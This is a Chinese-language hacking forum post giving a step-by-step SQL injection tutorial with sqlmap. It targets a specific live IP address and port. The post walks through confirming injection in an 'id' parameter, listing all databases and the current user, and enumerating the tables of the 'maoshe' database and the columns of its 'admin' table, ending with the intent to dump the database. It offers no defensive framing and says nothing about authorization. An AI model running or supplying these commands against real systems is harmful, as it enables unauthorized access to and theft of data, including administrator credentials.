无名商城论坛

搜索
查看: 217|回复: 0

[其他技术] 【梅开二度】sql注入

[复制链接]

1万

主题

1万

帖子

3万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
32464
发表于 2022-5-8 17:20:21 | 显示全部楼层 |阅读模式


首先在termux里输入 sqlmap -u "http://59.63.200.79:8003/?id=1" --dbs    如图一   注dbs前是两个 -
注入的结果表示:

(1)注入参数id为GET注入,注入类型有四种,分别是:boolean-based blind/error-based/time-based blind/union quer

(2)数据库类型:MySQL

(3)画红圈的是网址所有的数据库名单
这时,我们发现这个网址存在注入,并且拿到了所有数据库名单。我们决定查看当前使用的数据库

sqlmap -u "http://59.63.200.79:8003/?id=1" --current-db

画出的就是当前使用使用的数据库:maoshe,一会儿我们对它下手

然后我们探测当前的数据库使用账户

sqlmap -u "http://59.63.200.79:8003/?id=1" --current-user  如图三

可见当前的数据库使用账户为:maoshe@%

下面我们来探测maoshe这个数据库里的所有表
sqlmap -u "http://59.63.200.79:8003/?id=1" -D maoshe --tables  如图四

下面我们探测的是admin这个表的列

sqlmap -u "http://59.63.200.79:8003/?id=1" -D maoshe --tables -T admin --columns    如图五

表中字段明显拿到了,下一步果断脱库!

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表